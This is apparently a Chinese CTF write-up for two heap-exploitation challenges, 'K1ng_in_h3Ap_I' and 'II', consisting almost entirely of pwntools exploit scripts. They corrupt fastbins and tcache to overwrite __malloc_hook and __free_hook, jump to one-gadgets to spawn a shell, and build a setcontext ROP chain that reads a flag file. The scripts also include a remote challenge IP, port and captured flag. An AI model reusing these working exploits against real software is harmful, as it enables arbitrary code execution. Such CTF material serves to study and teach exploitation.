第一题没学过那种方法,自己打exit_hook花了好久。
第二题orw比较简单

K1ng_in_h3Ap_I

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!/usr/bin/env python
from pwn import *

binary = "./pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
p = process(binary)
p = remote("47.104.175.110","20066")
# flag{a3a6d84e-30b3-41ce-a6bc-158e2a975f73}
elf = ELF(binary)
libc = ELF(lib)
# context.log_level = "debug"

s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ra = lambda t=tube.forever:p.recvall(t)
ru = lambda delim: p.recvuntil(delim)
rl = lambda: p.recvline()
rls = lambda n=2**20: p.recvlines(n)
trs = lambda n: libc.address+n

def add(id,size):
	sal(">> ","1")
	sal("input index:",str(id))
	sal("input size:",str(size))
def free(id):
	sal(">> ","2")
	sal("input index:",str(id))
def edit(id,content):
	sal(">> ","3")
	sal("input index:",str(id))
	sa("input context:",content)
def leak():
	sal(">> ","666")

leak()
ru("\n")
libc.address = int(ru("\n"),16) - libc.sym["printf"]
info("libc baser => 0x%x"%libc.address)

add(0,0x18)
add(1,0x18)
add(2,0x18)
add(3,0x68)
add(4,0x18)
add(5,0x18)

edit(0,"\x00"*0x18+chr(0x20+0x21))
edit(1,"\x00"*0x18+chr(0x70+0x21))
free(1)
add(1,0x38)
free(2)
add(2,0x88)

free(3)

free(2)
add(2,0x18)
add(9,0x78)
edit(1,"\x00"*0x18+chr(0x70+0x21+0x20)+"\x0a")
free(2)

edit(1,"A"*0x18+p64(0x70+0x21+0x20)+p64(0)+p64(libc.address+0x5f0f48-0x20-0x10+3)[0:3]+"\n")
add(2,0xa8)
edit(2,"\x00"*0x18+p64(0x71)+p64(libc.address+0x5f0f48-0x20)[0:3]+"\n")

add(6,0x68)
add(6,0x68)


ogg = [libc.address+_ for _ in (0xf67f0,0xf1247,0xf03b0,0x45226,0x4527a,0xcd173,0xcd248,0xf03a4,0xf1247)]
og = ogg[1]

payload = ""
payload += p64(0)*2
payload += p64(og)[0:3]
payload += "\n"
edit(6,payload)

sal(">> ","1")
sal("input index:","12")

sh()

另一exp

  • tosay
    • libc.sym["_IO_2_1_stdout_"]-0x43的地方确实有错位size,且由于该地址+0x10处为0x0不会影响fast_bin的后续使用
    • libc.sym["__malloc_hook"]-0x23的地方确实有错位size,但该地址会破坏fast_bin
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/env python
from pwn import *



binary = "./pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
# p = remote("47.104.175.110","20066")
# flag{a3a6d84e-30b3-41ce-a6bc-158e2a975f73}

elf = ELF(binary)
libc = ELF(lib)
# context.log_level = "debug"

s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ra = lambda t=tube.forever:p.recvall(t)
ru = lambda delim: p.recvuntil(delim)
rl = lambda: p.recvline()
rls = lambda n=2**20: p.recvlines(n)
trs = lambda n: libc.address+n

def add(id,size):
	sal(">> ","1")
	sal("input index:",str(id))
	sal("input size:",str(size))
def free(id):
	sal(">> ","2")
	sal("input index:",str(id))
def edit(id,content):
	sal(">> ","3")
	sal("input index:",str(id))
	sa("input context:",content)
def leak():
	sal(">> ","666")


def main(p):
	# leak()
	# ru("\n")
	# libc.address = int(ru("\n"),16) - libc.sym["printf"]
	# info("libc base => 0x%x"%libc.address)

	add(0,0x18)
	add(1,0x18)
	add(2,0x68)
	add(3,0x18)

	free(2)
	edit(0,"\x00"*0x18+chr(0x71+0x20))
	free(1)
	add(4,0x18)
	add(5,0x58) #magic 由于剩下的小于了MIN_SIZE就绕过了很多,直接分配了
	edit(5,"\xdd\x35"+"\x0a")
	add(6,0x68)
	add(7,0x68)

	edit(7,"\x00"*0x33+p64(0xfbad3887)+p64(0)*3+"\x88"+"\n")

	libc.address = 0
	_IO_2_1_stdin_ = u64(ru("\x7f")[-6:]+"\x00\x00")
	libc.address = _IO_2_1_stdin_ - libc.sym["_IO_2_1_stdin_"]
	info("libc base => 0x%x"%libc.address)


	add(0,0x18)
	add(1,0x18)
	add(2,0x68)
	add(3,0x18)

	free(2)
	edit(0,"\x00"*0x18+chr(0x71+0x20))
	free(1)
	add(4,0x18)
	add(5,0x58)
	edit(5,p64(libc.sym["__malloc_hook"]-0x23)+"\x0a")
	add(6,0x68)
	add(7,0x68)

	ogg = [trs(_) for _ in (0x45226,0x4527a,0xf03a4,0xf1247)]
	og  = ogg[1]
	edit(7,"\x00"*(0x13-8)+p64(og)+p64(libc.sym["realloc"]+16)+"\n")
	add(0,0)


while True:
	try:
		p = process(binary)
		main(p)
		sh()
	except:
		p.close()


# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

K1ng_in_h3Ap_II

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
#!/usr/bin/env python
from pwn import *

binary = "./pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
p = process(binary)
elf = ELF(binary)
libc = ELF(lib)
# context.log_level = "debug"

s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambda delim, buf: p.sendlineafter(delim, buf)
sh = lambda: p.interactive()
r = lambda n=None: p.recv(n)
ra = lambda t=tube.forever:p.recvall(t)
ru = lambda delim: p.recvuntil(delim)
rl = lambda: p.recvline()
rls = lambda n=2**20: p.recvlines(n)
trs = lambda n: libc.address+n

def add(id,size):
	sal(">> ","1")
	sal("input index:",str(id))
	sal("input size:",str(size))
def free(id):
	sal(">> ","2")
	sal("input index:",str(id))
def show(id):
	sal(">> ","4")
	sal("input index:",str(id))
def edit(id,content):
	sal(">> ","3")
	sal("input index:",str(id))
	sal("input context:",content)

def clean():
	for _ in range(8):
		add(0,0x18)
	for _ in range(7):
		add(0,0x60)
	for _ in range(1):
		add(0,0x48)
clean()

add(0,0x60)
add(1,0x60)
free(0)
free(1)
show(1)
ru("\n")
# print("=>",ru("\n"))
heap = u64(ru("\n")[:-1]+"\x00\x00")-0xf30
info("heap base => 0x%x"%heap)
add(0,0x60)
add(0,0x60)

for _ in range(14):
	add(_,0x60)
edit(0,p64(0)*5+p64(0x41+0x70*10)+p64(0)*2)
free(0)
free(1)

edit(1,p64(heap+0x1040)+p64(0))
add(14,0x60)
add(15,0x60)
free(15)
show(15)

malloc_hook = u64(ru("\x7f")[-6:]+"\x00\x00")-96-0x10
libc.address = malloc_hook - libc.sym["__malloc_hook"]
info("libc base => 0x%x"%libc.address)

add(0,0x18)
add(1,0x18)
free(0)
free(1)
edit(1,p64(libc.sym["__free_hook"]))
add(0,0x18)
add(1,0x18)
edit(1,p64(trs(0x521b5)))
for _ in range(14):
	add(_,0x60)

pop_rdi = trs(0x00000000000215bf)
pop_rsi = trs(0x0000000000023eea)
pop_rdx = trs(0x0000000000001b96)
pop_rax = trs(0x0000000000043ae8)
syscall = trs(0x00000000000e5935)
pop_r12_13_14 = trs(0x0000000000023ee5)

add(0,0x58)
rdi = heap + 0x17f0
#####################################
payload = "./flag\x00\x00"
payload += p64(0)*10
edit(0,payload)

add(1,0x60)
payload = ""
payload += p64(0)
payload += p64(rdi)
payload += p64(0)*6
payload += p64(rdi+0xb0)
#####################################

##############open###################
payload += p64(pop_rax)
payload += p64(0x2)
payload += p64(pop_r12_13_14)
edit(1,payload)


add(2,0x60)
payload = p64(0)
payload += p64(syscall)
##############open###################

##############read###################
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi)
payload += p64(rdi)
payload += p64(pop_rdx)
payload += p64(0x80)
payload += p64(pop_rax)
payload += p64(0x0)
payload += p64(syscall)
payload += p64(pop_r12_13_14)
edit(2,payload)


add(3,0x60)
payload = ""
payload += p64(0)
##############read###################

##############write##################
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rax)
payload += p64(1)
payload += p64(syscall)
##############write##################
edit(3,payload)

free(0)
sh()
  • 相交之以往ORW,这次最大申请0x60,我使用的是set_context分块构造orw,分别是0x58,0x60,0x60大小顺序块